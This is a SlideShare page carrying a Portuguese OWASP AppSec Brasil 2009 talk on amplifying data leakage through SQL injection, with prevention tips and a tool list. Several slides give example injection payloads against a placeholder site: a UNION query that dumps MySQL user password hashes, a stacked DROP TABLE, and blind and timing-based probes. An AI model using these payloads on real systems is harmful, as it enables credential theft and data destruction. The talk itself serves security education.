SlideShare une entreprise Scribd logo

SQL Injection: Amplifying Data Leakeage

Ulisses Castro
Ulisses Castro

Palestra apresentada durante a Conferência Internacional de Segurança de Aplicações (AppSec Brasil 2009) http://www.owasp.org/index.php/AppSec_Brasil_2009

Technologie
1  sur  17
Télécharger pour lire hors ligne
SQL Injection Amplifying Data Leakage Ulisses Castro Security Researcher uss.castro@gmail.com OWASP Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
Ulisses Castro  Consultor, Instrutor e Pentester  Teste de Intrusão e Análise de Vulnerabilidades  Hardening S.O e Banco de Dados  Mantenedor Debian (selinux-basics)  CEH – Certified Ethical Hacker  LPIC-2 – Linux Professional Institute Certified  Colaborador em diversos projetos de software livre relacionados com segurança OWASP 2
Agenda Introdução Técnicas utilizadas Potencializando UNION (inband) group_concat concat_ws Demo PoC: sqlidump Idéias e possibilidades Prevenções Ferramentas recomendadas Duvidas, agradecimentos, contatos... OWASP 3
Introdução - O que é SQL Injection? Ataque de injeção em aplicações que não tratam de maneira adequada a entrada de dados do usuário permitindo que comandos SQL maliciosos possam ser enviados ao banco de dados. Uma das mais antigas e ainda mais utilizada vulnerabilidade em aplicações web. (1998 - Phrack 54) OWASP 4
Técnicas utilizadas UNION (inband) http://www.site.com/index.php?noticia=13 UNION ALL SELECT query -- http://www.site.com/index.php?noticia=13 UNION ALL SELECT null, concat(user,0x3a,password), null FROM mysql.user LIMIT 0,1-- STACKED http://www.site.com/index.asp?noticia=13; DROP TABLE noticias; -- OWASP 5
Técnicas utilizadas BLIND http://www.site.com/index.php?noticia=13 AND SUBSTRING(‘SELECT USER()’, 1, 1) = ‘a’-- BLIND (time based) http://www.site.com/index.php?noticia=13 UNION SELECT BENCHMARK(1000000000,MD5('testing')) OWASP 6
UNION (inband) DEMO Problema do LIMIT OWASP 7
Potencializando UNION (inband) GROUP_CONCAT() Retirado do manual (MySQL) “This function returns a string result with the concatenated non-NULL values from a group. (...) The result is truncated to the maximum length that is given by the group_concat_max_len system variable, which has a default value of 1024. (...)” OWASP 8
Potencializando UNION (inband) concat_ws() Retirado do manual (MySQL) “CONCAT_WS() stands for Concatenate With Separator and is a special form of CONCAT(). The first argument is the separator for the rest of the arguments. The separator is added between the strings to be concatenated. The separator can be a string, as can the rest of the arguments. If the separator is NULL, the result is NULL.” OWASP 9
Potencializando UNION (inband) concat_ws() Retirado do manual (MySQL) “CONCAT_WS() stands for Concatenate With Separator and is a special form of CONCAT(). The first argument is the separator for the rest of the arguments. The separator is added between the strings to be concatenated. The separator can be a string, as can the rest of the arguments. If the separator is NULL, the result is NULL.” OWASP 10
CONSULTA PREPARADA SELECT CONCAT('<DATA>','<row>',CONCAT_WS(CONCAT('<row>','<row>'), (CONCAT('<column>',CONCAT_WS(CONCAT('<column>','<column>'),IFNULL(CAST(id AS CHAR(10000)),0x20),IFNULL(CAST(nome AS CHAR(10000)),0x20),IFNULL(CAST(email AS CHAR(10000)),0x20)),'<column>')),(SELECT CONCAT('<column>',CONCAT_WS(CONCAT('<column>','<column>'),IFNULL(CAST(id AS CHAR(10000)),0x20),IFNULL(CAST(nome AS CHAR(10000)),0x20),IFNULL(CAST(email AS CHAR(10000)),0x20)),'<column>') FROM dummy.alunos LIMIT 1,1),(SELECT CONCAT('<column>',CONCAT_WS(CONCAT('<column>','<column>'),IFNULL(CAST(id AS CHAR(10000)),0x20),IFNULL(CAST(nome AS CHAR(10000)),0x20),IFNULL(CAST(email AS CHAR(10000)),0x20)),'<column>') FROM dummy.alunos LIMIT 2,1)),'<row>','<DATA>') FROM dummy.alunos LIMIT 0,1; OWASP 11
RESULTADO <DATA> <row> <column>1<column> <column>Mario Brother<column> <column>mario@dummy.com<column> <row> <row> <column>2<column> <column>Luigi Brother<column> <column>luigi@dummy.com<column> <row> <row> <column>3<column> <column>Koopa Silva<column> <column>koopa@dummy.com<column> <row> <DATA> OWASP 12
Potencializando UNION (inband) DEMO sqlidump.py OWASP 13
Algumas idéias... BLIND QUERY SELECT ASCII(SUBSTR((SELECT IFNULL(CAST(id AS CHAR(10000)),0x08) FROM dummy.alunos LIMIT 5,1),1,1)) <= 8; BLIND QUERY + CONCAT_WS() SELECT CONCAT('<BLIND>',GROUP_CONCAT(CONCAT( (ASCII(SUBSTR((SELECT IFNULL(CAST(id AS CHAR(10000)),'NULO') FROM dummy.alunos LIMIT 1,1),1,1)) <= 8), (ASCII(SUBSTR((SELECT IFNULL(CAST(id AS CHAR(10000)),'NULO') FROM dummy.alunos LIMIT 1,1),1,1)) <= 100) ) SEPARATOR '-'),'<BLIND>'); OWASP 14
Prevenções OWASP - SQL Injection Prevention Cheat Sheet Prepared Statements Stored Procedures Escapar e validar entrada Política do menor privilégio White list, regex, etc... OWASP 15
Ferramentas recomendadas... sqlmap http://sqlmap.sourceforge.net sqlsus http://sqlsus.sourceforge.net sqlninja http://sqlninja.sourceforge.net bsql hacker http://labs.portcullis.co.uk/application/bsql-hacker/ OWASP 16
OBRIGADO! CONTATOS: Ulisses Castro uss.castro@gmail.com http://ulissescastro.wordpress.com http://twitter.com/usscastro OWASP 17

Recommandé

Sql injection
Sql injection Sql injection
Sql injection Aaron Hill
 
Solit 2013, Автоматизация тестирования сложных систем: mixed mode automated t...
Solit 2013, Автоматизация тестирования сложных систем: mixed mode automated t...Solit 2013, Автоматизация тестирования сложных систем: mixed mode automated t...
Solit 2013, Автоматизация тестирования сложных систем: mixed mode automated t...solit
 
Nls
NlsNls
NlsAonjai Khemsuk
 
Learning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APILearning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APIcaswenson
 
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormguest785f78
 
Noinject
NoinjectNoinject
NoinjectJustin Swanhart
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
10 exceptionsin java
10 exceptionsin java10 exceptionsin java
10 exceptionsin javaAPU
 

Recommandé

Sql injection
Sql injection Sql injection
Sql injection Aaron Hill
 
Solit 2013, Автоматизация тестирования сложных систем: mixed mode automated t...
Solit 2013, Автоматизация тестирования сложных систем: mixed mode automated t...Solit 2013, Автоматизация тестирования сложных систем: mixed mode automated t...
Solit 2013, Автоматизация тестирования сложных систем: mixed mode automated t...solit
 
Nls
NlsNls
NlsAonjai Khemsuk
 
Learning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APILearning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APIcaswenson
 
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormguest785f78
 
Noinject
NoinjectNoinject
NoinjectJustin Swanhart
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
10 exceptionsin java
10 exceptionsin java10 exceptionsin java
10 exceptionsin javaAPU
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injectionbadhanbd
 
One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)Ferruh Mavituna
 
Advanced sql injection 2
Advanced sql injection 2Advanced sql injection 2
Advanced sql injection 2Karunakar Singh Thakur
 
Advanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptAdvanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptssuserde23af
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1Bernardo Damele A. G.
 
Sql injection
Sql injectionSql injection
Sql injectionBee_Ware
 
Sql
SqlSql
SqlManish Dixit Ceh
 
DEF CON 23 - amit ashbel and maty siman - game of hacks
DEF CON 23 - amit ashbel and maty siman - game of hacks DEF CON 23 - amit ashbel and maty siman - game of hacks
DEF CON 23 - amit ashbel and maty siman - game of hacks Felipe Prado
 
Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一
Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一
Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一scalaconfjp
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngDmitry Evteev
 
20161029 py con-mysq-lv3
20161029 py con-mysq-lv320161029 py con-mysq-lv3
20161029 py con-mysq-lv3Ivan Ma
 
Sq linjection
Sq linjectionSq linjection
Sq linjectionMahesh Gupta (DBATAG) - SQL Server Consultant
 
20160821 coscup-my sql57docstorelab01
20160821 coscup-my sql57docstorelab0120160821 coscup-my sql57docstorelab01
20160821 coscup-my sql57docstorelab01Ivan Ma
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300KOI Lastone
 
Jdbc ja
Jdbc jaJdbc ja
Jdbc jaDEEPIKA T
 
A MySQL Odyssey - A Blackhole Crossover
A MySQL Odyssey - A Blackhole CrossoverA MySQL Odyssey - A Blackhole Crossover
A MySQL Odyssey - A Blackhole CrossoverKeith Hollman
 
MongoDB World 2019: Life In Stitch-es
MongoDB World 2019: Life In Stitch-esMongoDB World 2019: Life In Stitch-es
MongoDB World 2019: Life In Stitch-esMongoDB
 
Java Performance Puzzlers
Java Performance PuzzlersJava Performance Puzzlers
Java Performance PuzzlersDoug Hawkins
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 

Contenu connexe

Similaire à SQL Injection: Amplifying Data Leakeage

Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injectionbadhanbd
 
One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)Ferruh Mavituna
 
Advanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptAdvanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptssuserde23af
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
Sql injection
Sql injectionSql injection
Sql injectionBee_Ware
 
DEF CON 23 - amit ashbel and maty siman - game of hacks
DEF CON 23 - amit ashbel and maty siman - game of hacks DEF CON 23 - amit ashbel and maty siman - game of hacks
DEF CON 23 - amit ashbel and maty siman - game of hacks Felipe Prado
 
Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一
Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一
Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一scalaconfjp
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngDmitry Evteev
 
20161029 py con-mysq-lv3
20161029 py con-mysq-lv320161029 py con-mysq-lv3
20161029 py con-mysq-lv3Ivan Ma
 
20160821 coscup-my sql57docstorelab01
20160821 coscup-my sql57docstorelab0120160821 coscup-my sql57docstorelab01
20160821 coscup-my sql57docstorelab01Ivan Ma
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300KOI Lastone
 
A MySQL Odyssey - A Blackhole Crossover
A MySQL Odyssey - A Blackhole CrossoverA MySQL Odyssey - A Blackhole Crossover
A MySQL Odyssey - A Blackhole CrossoverKeith Hollman
 
MongoDB World 2019: Life In Stitch-es
MongoDB World 2019: Life In Stitch-esMongoDB World 2019: Life In Stitch-es
MongoDB World 2019: Life In Stitch-esMongoDB
 
Java Performance Puzzlers
Java Performance PuzzlersJava Performance Puzzlers
Java Performance PuzzlersDoug Hawkins
 

Similaire à SQL Injection: Amplifying Data Leakeage (20)

Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injection
 
One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)
 
Advanced sql injection 2
Advanced sql injection 2Advanced sql injection 2
Advanced sql injection 2
 
Advanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptAdvanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).ppt
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasures
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql
SqlSql
Sql
 
DEF CON 23 - amit ashbel and maty siman - game of hacks
DEF CON 23 - amit ashbel and maty siman - game of hacks DEF CON 23 - amit ashbel and maty siman - game of hacks
DEF CON 23 - amit ashbel and maty siman - game of hacks
 
Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一
Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一
Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall Eng
 
20161029 py con-mysq-lv3
20161029 py con-mysq-lv320161029 py con-mysq-lv3
20161029 py con-mysq-lv3
 
Sq linjection
Sq linjectionSq linjection
Sq linjection
 
20160821 coscup-my sql57docstorelab01
20160821 coscup-my sql57docstorelab0120160821 coscup-my sql57docstorelab01
20160821 coscup-my sql57docstorelab01
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300
 
Jdbc ja
Jdbc jaJdbc ja
Jdbc ja
 
A MySQL Odyssey - A Blackhole Crossover
A MySQL Odyssey - A Blackhole CrossoverA MySQL Odyssey - A Blackhole Crossover
A MySQL Odyssey - A Blackhole Crossover
 
MongoDB World 2019: Life In Stitch-es
MongoDB World 2019: Life In Stitch-esMongoDB World 2019: Life In Stitch-es
MongoDB World 2019: Life In Stitch-es
 
Java Performance Puzzlers
Java Performance PuzzlersJava Performance Puzzlers
Java Performance Puzzlers
 

Dernier

Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesZilliz
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 

Dernier (20)

Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector Databases
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 

SQL Injection: Amplifying Data Leakeage

  • 1. SQL Injection Amplifying Data Leakage Ulisses Castro Security Researcher uss.castro@gmail.com OWASP Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 2. Ulisses Castro  Consultor, Instrutor e Pentester  Teste de Intrusão e Análise de Vulnerabilidades  Hardening S.O e Banco de Dados  Mantenedor Debian (selinux-basics)  CEH – Certified Ethical Hacker  LPIC-2 – Linux Professional Institute Certified  Colaborador em diversos projetos de software livre relacionados com segurança OWASP 2
  • 3. Agenda Introdução Técnicas utilizadas Potencializando UNION (inband) group_concat concat_ws Demo PoC: sqlidump Idéias e possibilidades Prevenções Ferramentas recomendadas Duvidas, agradecimentos, contatos... OWASP 3
  • 4. Introdução - O que é SQL Injection? Ataque de injeção em aplicações que não tratam de maneira adequada a entrada de dados do usuário permitindo que comandos SQL maliciosos possam ser enviados ao banco de dados. Uma das mais antigas e ainda mais utilizada vulnerabilidade em aplicações web. (1998 - Phrack 54) OWASP 4
  • 5. Técnicas utilizadas UNION (inband) http://www.site.com/index.php?noticia=13 UNION ALL SELECT query -- http://www.site.com/index.php?noticia=13 UNION ALL SELECT null, concat(user,0x3a,password), null FROM mysql.user LIMIT 0,1-- STACKED http://www.site.com/index.asp?noticia=13; DROP TABLE noticias; -- OWASP 5
  • 6. Técnicas utilizadas BLIND http://www.site.com/index.php?noticia=13 AND SUBSTRING(‘SELECT USER()’, 1, 1) = ‘a’-- BLIND (time based) http://www.site.com/index.php?noticia=13 UNION SELECT BENCHMARK(1000000000,MD5('testing')) OWASP 6
  • 7. UNION (inband) DEMO Problema do LIMIT OWASP 7
  • 8. Potencializando UNION (inband) GROUP_CONCAT() Retirado do manual (MySQL) “This function returns a string result with the concatenated non-NULL values from a group. (...) The result is truncated to the maximum length that is given by the group_concat_max_len system variable, which has a default value of 1024. (...)” OWASP 8
  • 9. Potencializando UNION (inband) concat_ws() Retirado do manual (MySQL) “CONCAT_WS() stands for Concatenate With Separator and is a special form of CONCAT(). The first argument is the separator for the rest of the arguments. The separator is added between the strings to be concatenated. The separator can be a string, as can the rest of the arguments. If the separator is NULL, the result is NULL.” OWASP 9
  • 10. Potencializando UNION (inband) concat_ws() Retirado do manual (MySQL) “CONCAT_WS() stands for Concatenate With Separator and is a special form of CONCAT(). The first argument is the separator for the rest of the arguments. The separator is added between the strings to be concatenated. The separator can be a string, as can the rest of the arguments. If the separator is NULL, the result is NULL.” OWASP 10
  • 11. CONSULTA PREPARADA SELECT CONCAT('<DATA>','<row>',CONCAT_WS(CONCAT('<row>','<row>'), (CONCAT('<column>',CONCAT_WS(CONCAT('<column>','<column>'),IFNULL(CAST(id AS CHAR(10000)),0x20),IFNULL(CAST(nome AS CHAR(10000)),0x20),IFNULL(CAST(email AS CHAR(10000)),0x20)),'<column>')),(SELECT CONCAT('<column>',CONCAT_WS(CONCAT('<column>','<column>'),IFNULL(CAST(id AS CHAR(10000)),0x20),IFNULL(CAST(nome AS CHAR(10000)),0x20),IFNULL(CAST(email AS CHAR(10000)),0x20)),'<column>') FROM dummy.alunos LIMIT 1,1),(SELECT CONCAT('<column>',CONCAT_WS(CONCAT('<column>','<column>'),IFNULL(CAST(id AS CHAR(10000)),0x20),IFNULL(CAST(nome AS CHAR(10000)),0x20),IFNULL(CAST(email AS CHAR(10000)),0x20)),'<column>') FROM dummy.alunos LIMIT 2,1)),'<row>','<DATA>') FROM dummy.alunos LIMIT 0,1; OWASP 11
  • 13. Potencializando UNION (inband) DEMO sqlidump.py OWASP 13
  • 14. Algumas idéias... BLIND QUERY SELECT ASCII(SUBSTR((SELECT IFNULL(CAST(id AS CHAR(10000)),0x08) FROM dummy.alunos LIMIT 5,1),1,1)) <= 8; BLIND QUERY + CONCAT_WS() SELECT CONCAT('<BLIND>',GROUP_CONCAT(CONCAT( (ASCII(SUBSTR((SELECT IFNULL(CAST(id AS CHAR(10000)),'NULO') FROM dummy.alunos LIMIT 1,1),1,1)) <= 8), (ASCII(SUBSTR((SELECT IFNULL(CAST(id AS CHAR(10000)),'NULO') FROM dummy.alunos LIMIT 1,1),1,1)) <= 100) ) SEPARATOR '-'),'<BLIND>'); OWASP 14
  • 15. Prevenções OWASP - SQL Injection Prevention Cheat Sheet Prepared Statements Stored Procedures Escapar e validar entrada Política do menor privilégio White list, regex, etc... OWASP 15
  • 16. Ferramentas recomendadas... sqlmap http://sqlmap.sourceforge.net sqlsus http://sqlsus.sourceforge.net sqlninja http://sqlninja.sourceforge.net bsql hacker http://labs.portcullis.co.uk/application/bsql-hacker/ OWASP 16
  • 17. OBRIGADO! CONTATOS: Ulisses Castro uss.castro@gmail.com http://ulissescastro.wordpress.com http://twitter.com/usscastro OWASP 17